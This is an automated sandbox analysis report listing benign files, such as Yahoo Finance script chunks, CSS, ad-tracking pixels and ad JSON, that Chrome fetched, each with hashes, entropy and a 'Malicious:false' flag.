                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:"https://dt.adsafeprotected.com/dt?advEntityId=2233400&asId=38c6b108-4dfa-76fb-59d4-d5cea654b422&tv=%7Bc:qyx6Yi,pingTime:5,time:9426,type:p,clog:%5B%7Bpiv:0,vs:o,r:r,w:728,h:90,t:111%7D,%7Bpiv:100,vs:i,r:,t:4415%7D%5D,es:0,sc:1,ha:1,fgad:1,fif:0,gmnp:0,for:0,b11:0,cnod:1,gm:0,slTimes:%7Bi:5011,o:4415,n:0,pp:0,pm:0%7D,slEvents:%5B%7Bsl:o,t:111,wc:0.0.1280.984,ac:NaN.NaN.728.90,am:i,cc:NaN.NaN.728.90,piv:0,obst:0,th:0,reas:r,bkn:%7Bpiv:%5B4372~0%5D,as:%5B4372~728.90%5D%7D%7D,%7Bsl:i,t:4415,wc:0.0.1280.984,ac:NaN.NaN.728.90,am:i,cc:NaN.NaN.728.90,piv:100,obst:0,th:0,reas:,bkn:%7Bpiv:%5B5011~100%5D,as:%5B5011~728.90%5D%7D%7D%5D,slEventCount:2,em:true,fr:false,e:,tt:rjss,dtt:1644,fm:uqDOUlz+11%7C12%7C13%7C14%7C151%7C16%7C1711%7C1712%7C1713%7C1714%7C1715%7C1716%7C1717%7C1718%7C1719%7C171a%7C171b%7C171c%7C171d%7C171e%7C171f%7C171g%7C171h%7C171i%7C171j%7C171k%7C172%7C1731%7C1732%7C18%7C19%7C1a1%7C1a2%7C1a3%7C1a4%7C1a5%7C1a6%7C1b%7C1c%7C1d%7C1e%7C1f%7C1g11%7C1g12%7C1g2%7C1h%7C1i%7C1j%7C1k%7C1l1%7C1m%7C1n%7C1o%7C1p%7C1q%7C1r*.2233400-82744863%7C1r1,idMap:1r*,rmeas:1,rend:1,renddet:DIV.qs.sn,siq:121,sis:3872%7D&br=c"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:Java source, ASCII text, with very long lines (1399)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1400
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.31252351999454
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24:IZlHSXkt+OECsFcWGFt2xgmTAUd6zgVLfTfT6A4Jr22ddOBAzAjMP+HSF:IZJvtHtsrGDtmTHdo0rfTt4J338jMWk
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:6392EBF700F4B78C063C4B87162CF8A0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:2B382C8FBC88C9E7C0A1E255A50C8CEF55634D0C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:DEA0CE4CE519950CA1547DA449E5BE6F1BCE083F08FEE48E962C0F4C8ABEE656
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:43172E5908BE9E48DE0AD1CC53527E5423302B4F0BA632FAE8BEF260E70ACB0FC741F655878E126928D2EF61A5724AA63477B233F00470945C84D3F3A0069E0A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:import{s as z,p as u,k as v,n as _,i as m,Y as d,A as o,T as b,e as N,H as k,d as H,f as I,z as p,B as g,U as h}from"./scheduler.Dr9AAxFe.js";import{g as S}from"./spread.CgU5AtxT.js";import{S as T,i as q}from"./index.DCSmZEjO.js";function y(a){let e,s,i,l=[{class:i=`icon fin-icon ${a[3]}-icn sz-${a[2]} ${a[0]}`},a[4]],c={};for(let t=0;t<l.length;t+=1)c=o(c,l[t]);return{c(){e=N("div"),s=new k(!1),this.h()},l(t){e=H(t,"DIV",{class:!0});var n=I(e);s=p(n,!1),n.forEach(m),this.h()},h(){s.a=null,g(e,c),h(e,"yf-7v4gbg",!0)},m(t,n){v(t,e,n),s.m(a[1],e)},p(t,n){n&2&&s.p(t[1]),g(e,c=S(l,[n&13&&i!==(i=`icon fin-icon ${t[3]}-icn sz-${t[2]} ${t[0]}`)&&{class:i},n&16&&t[4]])),h(e,"yf-7v4gbg",!0)},d(t){t&&m(e)}}}function A(a){let e,s=typeof a[1]=="string"&&y(a);return{c(){s&&s.c(),e=u()},l(i){s&&s.l(i),e=u()},m(i,l){s&&s.m(i,l),v(i,e,l)},p(i,[l]){typeof i[1]=="string"?s?s.p(i,l):(s=y(i),s.c(),s.m(e.parentNode,e)):s&&(s.d(1),s=null)},i:_,o:_,d(i){i&&m(e),s&&s.d(i)}}}function B(a,e,s){const i=["classNa
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):7872
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.015774163398993
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:192:qvpSPxSYwotbxVkmXsW7Ik21zq7H0AfdZw+uRV7aVFk66Cui4WE:7PxSYwIlXsWsk21m7H0AfdC+ufaFNuLV
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:BC0F82F7968736868CEC180E9FEAA9E2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:F62F40501B61CC0341D9CF5A1A512C229547210C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:F07E1F3F75BBEDB7AD1A048B5AB9D31F7F88A87BCF7D1D7D6DFB4E12AD478A02
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:32DA36E91A4CA108E13719D932E3E7EEA0FB15F9B8BD6F8DC58A59F3AE30A8E4AECA0F17ED567728ED484EEE65BA04BF28F80487DF88F95E01DD7977BECD42B0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:{"sodar_query_id":"r4QFZ8LPF_KOjuwP1I692QU","injector_basename":"sodar2","bg_hash_basename":"_AApIiWo-qoygbJTte9jDqAiWCWSDTrVJ4yIX1hHtxY","bg_binary":"SGaZUo1dkSxMCJPmd5PcHiW1kDlitpadDNvvbC2ZIktfQHvduYzcyhCWivSFAtHecu9oKBJQPfFsNqbSMcP3M7iBTM7cJyuOgMJ/WPyVpE5iIPRtuDAncqfiQMUf8YVZehgfcSVoB7VVyweDZ1zH/cqMn4xuXsqgITX2IjYaEjKhEEJzUXegHaRGxZmb9NNk3ZpUMDc7GJWPae6EjtxJh026xO0wJXQdnqrCnfv+e+juieFNUSFOWlUu//8K+87RJV3uZl/9Eo7ElokbhQ7QLADVUJMs/U/51nq+g+aoiGd823geqIdyg2D027qsac+zIiPKTNnfpNYF0rH8BW8NofSOGpeRm32SdJrGMpHWtjLMn+SLn5xHoXhackJYsxhCL98qvD0vJW8fuM2MjGhcf7EDYL+ACpMz7j5OKjv4SMW2DLx7MxZ3E+yeOpZeXWncKr9AIUWxEl+6UZyUoqKzqI8zJHY1yzd5bZpIKY1twwZs7jfax1XCFTN/uS0Hp+JGvvSRgoJ8WUDCt+ll8Ix6SaQuceT13abqaipHiogwwdeY5WzF7DcUmCl+nL9lObMINqmMGWAyyIV8pH2EIBFncJobz4Gwnr0pyomi+MmbI7r0hkQ6pZEX72FOlPaJ5bOCqa43xxqvUknoJItHFaoFLa/WjdbL+Z6UOWxHIutYgsIgNWbHK7lCXk4sfAjt4dXjhlfH7CUR7Evbb1yx+djcDS2pdPHpc9+h1t6UMZ+auB2o5ckftMlPVCzWeYXHdvTb4tfEBkf/xtuBhf/4b45ZM1s6AqMjp3GkAnBBv48s2iMkIYajv5Umq3+wjUKl7fc2mwf75vhiQ1+svYZNG
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):170
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.335916817166796
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:yionv//thPlE+tnM5OCAadCmy42/uDlhlbGlo+4/iRXTECLrlxyxtyaC/tIlsg1B:6v/lhPfZMQC19s/6TdKXTECL6yR/iVB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:E7673C60AF825466F83D46DA72CA1635
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:FC0FCBEE0835709BA2D28798A612BFD687903FB5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:0B8A20373C6DD04E091902226D922B3688143A8938AFB9D283D889DE7B55CEB5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:F1C33E72643CE366FD578E3B5D393799E8C9EA27B180987826AF43B4FC00B65A4EAAE5E6426A23448956FEE99E3108C6A86F32FB4896C156E24AF0571A11C498
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://cm.g.doubleclick.net/pixel?google_nid=bidswitch_dbm&google_hm=MTUzOGNlYWQtOTQ2Yy00ZjJlLTkwNDUtNmFhYTE4OTcyNDY0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.PNG........IHDR....................bKGD..............pHYs.................tIME......-Q.7n....tEXtComment.Created with The GIMP.d%n....IDAT..c.iy......+........IEND.B`..
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (49370)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):791254
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.521612664715816
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24576:YbSoIjNrazWpe7Y6zLBL5JChBjLSuJpr6Bv7HWXQ0dsnpNAaDiwlzjv:YbSoIjNrazWpe7Y6zLBL5JMpSmr6Bv7J
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:BAD4174B4BBAEE72DACE254581615D71
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:887B3D297B6BC4015C0882E2896900DC8386AC83
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:30DEB2563394DB642D9D755E8280B975E27A1335DFB19A985C7C75FB3266A634
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:1854711871C44782506083C8CEBC574DC91ACF4EFD22AC330A0261817F9891FA07E1327A6E6EC27B1957EA37D4742342296DA0939718F149BB4D9ED36DA72459
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://ajax.googleapis.com/ajax/libs/model-viewer/1.6.0/model-viewer.min.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:/**. * @license. * Copyright (c) 2017 The Polymer Project Authors. All rights reserved.. * This code may only be used under the BSD style license found at. * http://polymer.github.io/LICENSE.txt. * The complete set of authors may be found at. * http://polymer.github.io/AUTHORS.txt. * The complete set of contributors may be found at. * http://polymer.github.io/CONTRIBUTORS.txt. * Code distributed by Google as part of the polymer project is also. * subject to an additional IP rights grant found at. * http://polymer.github.io/PATENTS.txt. */.String(Math.random()).slice(2),./**. * @license. * Copyright (c) 2017 The Polymer Project Authors. All rights reserved.. * This code may only be used under the BSD style license found at. * http://polymer.github.io/LICENSE.txt. * The complete set of authors may be found at. * http://polymer.github.io/AUTHORS.txt. * The complete set of contributors may be found at. * http://polymer.github.io/CONTRIBUTORS.txt. * Code distributed by Google as part of the
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:Radiance HDR image data
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):104536
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.244901013582713
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3072:mIFk4Rd3HeqfTxRF6f+TO7ClnmqgFxcTH:bz8q7x/i2OG5mqgoD
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:AAFAE3373018D2B833B61DF6F0E4C328
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:A2DC733692EBDF1EF33A63E51207B6B5FBC799FC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:DB0B6C5AF55B217512543878B20D6A3C02B6722649CD22159CE08A8F7E6D93E5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:A47B6D01A59802156BA3596D5F99E59DE30B1D116A28BF3E5F91F2C707B5913FE05B47E47D2BE83A3E9F71322BAE0ED4008AB94D0CA9AD15E316718249CA4F1D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:#?RADIANCE.# Made with Adobe Photoshop.FORMAT=32-bit_rle_rgbe..-Y 128 +X 256......................................................................................ZYZZZY...................................................................................a....................................................................................................................................................__^^]]\\[[Z............YZZ.[.Z.["Z..................[[......................................................................................[.\.]]]^^^___``aabceecbbaa``__^^._.`.a.`._.^.].\.].^._.e.ddccbba............aaa.b.a.b.a...............cc.........................................................................................bbbccc.d.e.ffggghhijlljiiihhgggff.g.f.e.d.c.d.e.f.....................................................................................................................................................................................................[[Z..
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):170
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.335916817166796
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:yionv//thPlE+tnM5OCAadCmy42/uDlhlbGlo+4/iRXTECLrlxyxtyaC/tIlsg1B:6v/lhPfZMQC19s/6TdKXTECL6yR/iVB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:E7673C60AF825466F83D46DA72CA1635
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:FC0FCBEE0835709BA2D28798A612BFD687903FB5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:0B8A20373C6DD04E091902226D922B3688143A8938AFB9D283D889DE7B55CEB5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:F1C33E72643CE366FD578E3B5D393799E8C9EA27B180987826AF43B4FC00B65A4EAAE5E6426A23448956FEE99E3108C6A86F32FB4896C156E24AF0571A11C498
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.PNG........IHDR....................bKGD..............pHYs.................tIME......-Q.7n....tEXtComment.Created with The GIMP.d%n....IDAT..c.iy......+........IEND.B`..
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:Java source, ASCII text, with very long lines (7531)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):7532
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.363197670162047
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:192:naiF7rzzTpLh7tWKhp4MWKGOocCZlY5v8wF0pNhq:nJF7PzTpLpAnMkOJCZlY5v8wFp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:97303888B0BCCF2B0F1DFD0991A1EFB0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:5ECCAD441A258549A7D03C51034DABEFE31195E1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:918DD66709B049DA825E1171F5EA7DDCB10F92F3C39CE7C9F86BFC39E15D05B0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:D11F957B2ECE1F207C06FF469D3A66A8B968EFF8D430A72AB747C98B264E1AEE51DAD9365B04A933C06D1542857F64C0F136ACBB468142D2B206D864FA369B4D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://finance.yahoo.com/assets/_app/immutable/chunks/RMP.DAY9oSd8.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:import{s as ae,p as h,b as M,w as re,i as w,j as O,l as K,k as C,x as Q,y as ce,e as oe,d as ne,q as F,H as P,z,A as _e,f as he,B as S,C as ue,c as me,u as de,g as pe,a as be,n as V}from"./scheduler.Dr9AAxFe.js";import{S as ke,i as we,g as ge,a as G,e as ye,t as J}from"./index.DCSmZEjO.js";import{g as je}from"./globals.D0QH3NT1.js";import{e as U}from"./each.BExQfwb4.js";import{g as ve}from"./spread.CgU5AtxT.js";import{g as Ne}from"./commonUtil.CI22_Irn.js";const{document:T}=je;function X(o,l,s){const t=o.slice();return t[13]=l[s],t}function Y(o,l,s){const t=o.slice();return t[16]=l[s],t}function Z(o){let l,s;return{c(){l=oe("link"),this.h()},l(t){l=ne(t,"LINK",{href:!0,rel:!0}),this.h()},h(){F(l,"href",s=typeof o[16]=="string"?o[16]:o[16].value),F(l,"rel","stylesheet")},m(t,e){C(t,l,e)},p(t,e){e&8&&s!==(s=typeof t[16]=="string"?t[16]:t[16].value)&&F(l,"href",s)},d(t){t&&w(l)}}}function A(o){let l,s=o[0].js+"",t;return{c(){l=new P(!1),t=h(),this.h()},l(e){l=z(e,!1),t=h(),this.h()},h(){l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:Java source, ASCII text, with very long lines (1107)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1108
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.310624183859769
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24:gmF1qX95uc8WdZHgvaBPcsBItArS/SAGIMShSbSEAP34vn:gmF1eIWDwaBIqr+GINSXvvn
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:DA000C6C6667D19116806B7B7952DB74
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:B83A42C58537264F4AF276902B4DB0753185EA3F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:1D2D1869FE759F5E1B180FF955455C62635BB0BC6FF3B025E583808AD6D9AFFB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:E4C7AEC96040251F8FEC5827247AA6B011E3BFA6D04DE855BF7896067FA20580106444CC41C6F34FED424BE5A3C727AB557906F8010BF817BEF7F005675F1CFE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:import{s as _,A as n,e as h,d as I,f as y,i as f,B as c,U as r,k as v,n as u,Y as g,T as N}from"./scheduler.Dr9AAxFe.js";import{g as k}from"./spread.CgU5AtxT.js";import{S,i as b}from"./index.DCSmZEjO.js";function q(s){let e,a,d=[{class:a="loader "+s[0]+" "+s[2]+" "+s[1]},{"data-testid":"skeleton-loader"},s[3]],l={};for(let t=0;t<d.length;t+=1)l=n(l,d[t]);return{c(){e=h("div"),this.h()},l(t){e=I(t,"DIV",{class:!0,"data-testid":!0}),y(e).forEach(f),this.h()},h(){c(e,l),r(e,"wideImg",s[2]),r(e,"yf-10mmfrb",!0)},m(t,i){v(t,e,i)},p(t,[i]){c(e,l=k(d,[i&7&&a!==(a="loader "+t[0]+" "+t[2]+" "+t[1])&&{class:a},{"data-testid":"skeleton-loader"},i&8&&t[3]])),r(e,"wideImg",t[2]),r(e,"yf-10mmfrb",!0)},i:u,o:u,d(t){t&&f(e)}}}function w(s,e,a){const d=["type","className","wideImg"];let l=g(e,d),{type:t="default"}=e,{className:i=""}=e,{wideImg:o=!1}=e;return s.$$set=m=>{e=n(n({},e),N(m)),a(3,l=g(e,d)),"type"in m&&a(0,t=m.type),"className"in m&&a(1,i=m.className),"wideImg"in m&&a(2,o=m.wideImg)},[t,i,o,
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (544)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):545
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.867852282117392
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12:lJVNc7egacUf4UfE1Vbj1nlXFVNFmARMKyZ/JjDUf9C:l72rt11VP17V60WZ/tDL
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:DD91E0ABE8D5B11B245037F3809BCF0F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:6A269183250323937AE8454F695CEEDA34362E69
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:0904C53646E130F7343306BD64E3F836EB8643784FBD7B8F9B138A88F32D05DF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:6F83D87D9F8705BC373CD3549B46DDF40C7F6D3B649B9CE535ED111D873874C7A76CB5FC929B709776B520F8CCFE164A5BB13BF18B79E3D24DB87E977E02B4E8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://finance.yahoo.com/assets/_app/immutable/assets/DataTablePagination.lDuKHVf0.css
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.paginationContainer.yf-1tdhqb1{width:100%;padding:var(--space-2);display:grid;grid-template-columns:auto;grid-template-areas:"dropdown total" "buttons buttons";grid-gap:var(--space-5);align-items:center}.select-dropdown.yf-1tdhqb1{grid-area:dropdown;display:flex;justify-content:end;align-items:center;gap:var(--space-2)}.total.yf-1tdhqb1{grid-area:total}.buttons.yf-1tdhqb1{grid-area:buttons;justify-self:center}@media (min-width: 768px){.paginationContainer.yf-1tdhqb1{grid-template-columns:1fr;grid-template-areas:"dropdown total buttons"}}.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:U:U
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):30489
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.239671138085263
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:768:UE6tkturviWurviebpR/X4WPCkPO84sKIoyAbY:UEYpiBiu3IWZr+bY
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:E8AB57A9900AC5FB5C98BD7BAD65E17A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:D138D86D508D7DBF1A7A2BB909FA13E71B0696DE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:EAA3C12F737734384F9DE70342841139FDA1B14DD6E38BCC08DD5D7F3FDE0207
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:14EB913BA1E1BDB26ADC01FE09B3C54644B75BA70743E3FA22F22A0E8B05F0768373C1C8BF0B42B2075FE9F7C7243AF985E04EF003CBE71FC77CD7D7E2873A07
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:{"/22888152279/us/yfin/screen/dt/us_yfin_screen_dt_top_center":["html",0,null,null,1,250,970,0,1,null,null,1,1,[["ID=006e5cc2c4fa1521:T=1728414884:RT=1728414884:S=ALNI_MZihFHl0wOL1tvwqvNtppnT-xGVhQ",1762110884,"/","yahoo.com",1],["UID=00000f31c5d05257:T=1728414884:RT=1728414884:S=ALNI_Mbbqo1qT7WR3EWk0yNFlZ9RfWOc3w",1762110884,"/","yahoo.com",2]],[138477785720],[6275051704],[5285812218],[3186246143],[539868,658893],null,null,null,null,null,null,1,null,null,null,null,null,null,null,"CKfm3Jm__4gDFSuogwcdZv0w9g",null,null,null,null,null,null,null,null,null,null,null,null,null,null,"1",null,null,null,null,null,null,null,null,null,null,null,null,null,null,1,null,null,null,[["ID=71a026a46cc036eb:T=1728414884:RT=1728414884:S=AA-AfjZ2lLTfk94ZgGGtOTMAz1Ce",1743966884,"/","yahoo.com"]],[]]}.<!doctype html><html><head><script>var jscVersion = 'r20241007';</script><script>var google_casm=[];</script></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><div class="GoogleActiveV
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (14394)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):14706
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.4205091835205925
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:384:ys9X0SCg8UoDthaNyvhCV/KJKWrKFKiL2LKIQNvdNFKlRCLJTsK54:tdCDLDthDQL2IwR8TC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:D4B1B65CB91E146E8AD42571060AFDAC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:08BA322F600D9B6927A25EF9E9E426D946CDB624
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:45F8135B8AEEDEFF283C4057E5056C6839A30B380F13E3D663A1A0AF7FB7C7D8
